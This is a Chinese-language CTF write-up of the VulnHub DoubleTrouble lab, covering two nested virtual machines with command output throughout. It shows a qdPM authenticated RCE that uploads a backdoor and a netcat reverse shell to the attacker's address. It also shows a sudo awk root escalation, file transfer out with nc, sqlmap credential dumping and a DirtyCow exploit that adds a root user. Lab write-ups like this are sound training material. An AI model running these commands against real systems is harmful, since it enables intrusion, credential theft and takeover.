打靶记录(一六三)之VulnHubDoubleTrouble

端口扫描

┌──(mikannse㉿kali)-[~/vulnhub]
└─$ sudo nmap --min-rate=10000 -p- 192.168.56.103
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-13 19:09 HKT
Nmap scan report for 192.168.56.103
Host is up (0.00040s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:C2:7D:2A (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.73 seconds

┌──(mikannse㉿kali)-[~/vulnhub]
└─$ sudo nmap -sT -sC -sV -O -p22,80 192.168.56.103
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-13 19:09 HKT
Nmap scan report for 192.168.56.103
Host is up (0.00038s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)
|   256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)
|_  256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: qdPM | Login
MAC Address: 08:00:27:C2:7D:2A (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.50 seconds

Getshell

访问 http://double.hub/core/config/databases.yml

得到

all:
  doctrine:
    class: sfDoctrineDatabase
    param:
      dsn: 'mysql:dbname=qdpm;host=localhost'
      profiler: false
      username: otis
      password: "<?php echo urlencode('rush') ; ?>"
      attributes:
        quote_identifier: true 

得到otis:rush

但是登录以及RCE是需要邮箱的，这里并不知道邮箱

扫描一下目录，得到一个secret

┌──(mikannse㉿kali)-[~/vulnhub/double]
└─$ gobuster dir -u http://double.hub/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,txt,zip,bak,rar,sql,pdf
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://double.hub/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              rar,sql,pdf,php,txt,zip,bak
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 275]
/images               (Status: 301) [Size: 309] [--> http://double.hub/images/]
/index.php            (Status: 200) [Size: 5806]
/uploads              (Status: 301) [Size: 310] [--> http://double.hub/uploads/]
/css                  (Status: 301) [Size: 306] [--> http://double.hub/css/]
/template             (Status: 301) [Size: 311] [--> http://double.hub/template/]
/core                 (Status: 301) [Size: 307] [--> http://double.hub/core/]
/install              (Status: 301) [Size: 310] [--> http://double.hub/install/]
/js                   (Status: 301) [Size: 305] [--> http://double.hub/js/]
/check.php            (Status: 200) [Size: 0]
/sf                   (Status: 301) [Size: 305] [--> http://double.hub/sf/]
/readme.txt           (Status: 200) [Size: 470]
/robots.txt           (Status: 200) [Size: 26]
/secret               (Status: 301) [Size: 309] [--> http://double.hub/secret/]
/backups              (Status: 301) [Size: 310] [--> http://double.hub/backups/]
/batch                (Status: 301) [Size: 308] [--> http://double.hub/batch/]
/.php                 (Status: 403) [Size: 275]
/server-status        (Status: 403) [Size: 275]
Progress: 1764480 / 1764488 (100.00%)
===============================================================
Finished
===============================================================

访问/secret，得到一张图片,发现存在隐写

┌──(mikannse㉿kali)-[~/vulnhub/double]
└─$ stegseek doubletrouble.jpg   
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: "92camaro"       
[i] Original filename: "creds.txt".
[i] Extracting to "doubletrouble.jpg.out".

得到:

otisrush@localhost.com
otis666

查找历史漏洞

┌──(mikannse㉿kali)-[~/vulnhub/double]
└─$ searchsploit qdPM
------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                     |  Path
------------------------------------------------------------------- ---------------------------------
qdPM 7 - Arbitrary File upload                                     | php/webapps/19154.py
qdPM 7.0 - Arbitrary '.PHP' File Upload (Metasploit)               | php/webapps/21835.rb
qdPM 9.1 - 'cfg[app_app_name]' Persistent Cross-Site Scripting     | php/webapps/48486.txt
qdPM 9.1 - 'filter_by' SQL Injection                               | php/webapps/45767.txt
qdPM 9.1 - 'search[keywords]' Cross-Site Scripting                 | php/webapps/46399.txt
qdPM 9.1 - 'search_by_extrafields[]' SQL Injection                 | php/webapps/46387.txt
qdPM 9.1 - 'type' Cross-Site Scripting                             | php/webapps/46398.txt
qdPM 9.1 - Arbitrary File Upload                                   | php/webapps/48460.txt
qdPM 9.1 - Remote Code Execution                                   | php/webapps/47954.py
qdPM 9.1 - Remote Code Execution (Authenticated)                   | php/webapps/50175.py
qdPM 9.1 - Remote Code Execution (RCE) (Authenticated) (v2)        | php/webapps/50944.py
qdPM 9.2 - Cross-site Request Forgery (CSRF)                       | php/webapps/50854.txt
qdPM 9.2 - Password Exposure (Unauthenticated)                     | php/webapps/50176.txt
qdPM < 9.1 - Remote Code Execution                                 | multiple/webapps/48146.py

有了凭证就直接RCE，会自动写入一个后门

┌──(mikannse㉿kali)-[~/vulnhub/double]
└─$ python 50944.py -url http://double.hub/ -u otisrush@localhost.com -p otis666
You are not able to use the designated admin account because they do not have a myAccount page.

The DateStamp is 2024-10-13 06:30 
Backdoor uploaded at - > http://double.hub/uploads/users/399546-backdoor.php?cmd=whoami

做一个反弹shell

┌──(mikannse㉿kali)-[~/vulnhub/double]
└─$ curl 'http://double.hub/uploads/users/399546-backdoor.php?cmd=nc%20192.168.56.102%20443%20-e%20%2Fbin%2Fbash'

提权

有一个sudo可以执行

www-data@doubletrouble:~/html$ sudo -l
sudo -l
Matching Defaults entries for www-data on doubletrouble:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on doubletrouble:
    (ALL : ALL) NOPASSWD: /usr/bin/awk

www-data@doubletrouble:~/html$ sudo /usr/bin/awk 'BEGIN {system("/bin/sh")}'
sudo /usr/bin/awk 'BEGIN {system("/bin/sh")}'

但是在/root发现还有一个ova,将其下载下来

# cat doubletrouble.ova |nc 192.168.56.102 1234
cat doubletrouble.ova |nc 192.168.56.102 1234

---

端口扫描

┌──(mikannse㉿kali)-[~/vulnhub/double]
└─$ sudo nmap --min-rate=10000 -p- 192.168.56.104
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-13 19:47 HKT
Nmap scan report for 192.168.56.104
Host is up (0.00052s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:2A:55:9E (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.80 seconds

┌──(mikannse㉿kali)-[~/vulnhub/double]
└─$ sudo nmap -sT -sC -sV -O -p22,80 192.168.56.104
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-13 19:47 HKT
Nmap scan report for 192.168.56.104
Host is up (0.00035s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.0p1 Debian 4+deb7u4 (protocol 2.0)
| ssh-hostkey: 
|   1024 e8:4f:84:fc:7a:20:37:8b:2b:f3:14:a9:54:9e:b7:0f (DSA)
|   2048 0c:10:50:f5:a2:d8:74:f1:94:c5:60:d7:1a:78:a4:e6 (RSA)
|_  256 05:03:95:76:0c:7f:ac:db:b2:99:13:7e:9c:26:ca:d1 (ECDSA)
80/tcp open  http    Apache httpd 2.2.22 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.22 (Debian)
MAC Address: 08:00:27:2A:55:9E (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.16
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.12 seconds

Sql注入

80有一个网站，只有一个index.php,抓一个登录的请求包跑sqlmap

┌──(mikannse㉿kali)-[~/vulnhub/double]
└─$ sqlmap -r sql.txt --level 5 --risk 3 --batch
        ___
       __H__                                                                                         
 ___ ___[']_____ ___ ___  {1.8.9#stable}                                                             
|_ -| . [)]     | .'| . |                                                                            
|___|_  [,]_|_|_|__,|  _|                                                                            
      |_|V...       |_|   https://sqlmap.org                                                         

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 19:57:00 /2024-10-13/

[19:57:01] [INFO] parsing HTTP request from 'sql.txt'
[19:57:01] [INFO] resuming back-end DBMS 'mysql' 
[19:57:01] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=11' AND (SELECT 6123 FROM (SELECT(SLEEP(5)))UvOg) AND 'gYYV'='gYYV&psw=11&btnLogin=Login
---
[19:57:01] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 7 (wheezy)
web application technology: PHP 5.5.38, Apache 2.2.22
back-end DBMS: MySQL >= 5.0.12
[19:57:01] [INFO] fetched data logged to text files under '/home/mikannse/.local/share/sqlmap/output/192.168.56.104'                                                                                      

[*] ending @ 19:57:01 /2024-10-13/

dump一下

┌──(mikannse㉿kali)-[~/vulnhub/double]
└─$ sqlmap -r sql.txt --dump

得到两个账号

+----------+----------+
| password | username |
+----------+----------+
| GfsZxc1  | montreux |
| ZubZub99 | clapton  |
+----------+----------+

第二条能够ssh登录

提权

发现内核版本很低,尝试dirtycow

上传exp至靶机，然后编译

clapton@doubletrouble:/tmp$ gcc 40839.c -pthread -o pwn -lcrypt
clapton@doubletrouble:/tmp$ chmod +x pwn
clapton@doubletrouble:/tmp$ ./pwn
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: 
Complete line:
firefart:fiTEKO3e4DQww:0:0:pwned:/root:/bin/bash

mmap: 7fd50b5b8000
madvise 0

ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '1q2w3e!'.


DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '1q2w3e!'.


DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd

会生成一个新的root权限用户，密码能够自己设置

clapton@doubletrouble:~$ su firefart
Password: 
su: Authentication failure
clapton@doubletrouble:~$ su firefart
Password: 
firefart@doubletrouble:/home/clapton# id
uid=0(firefart) gid=0(root) groups=0(root)

碎碎念

套娃虚拟机，前面也一堆脑洞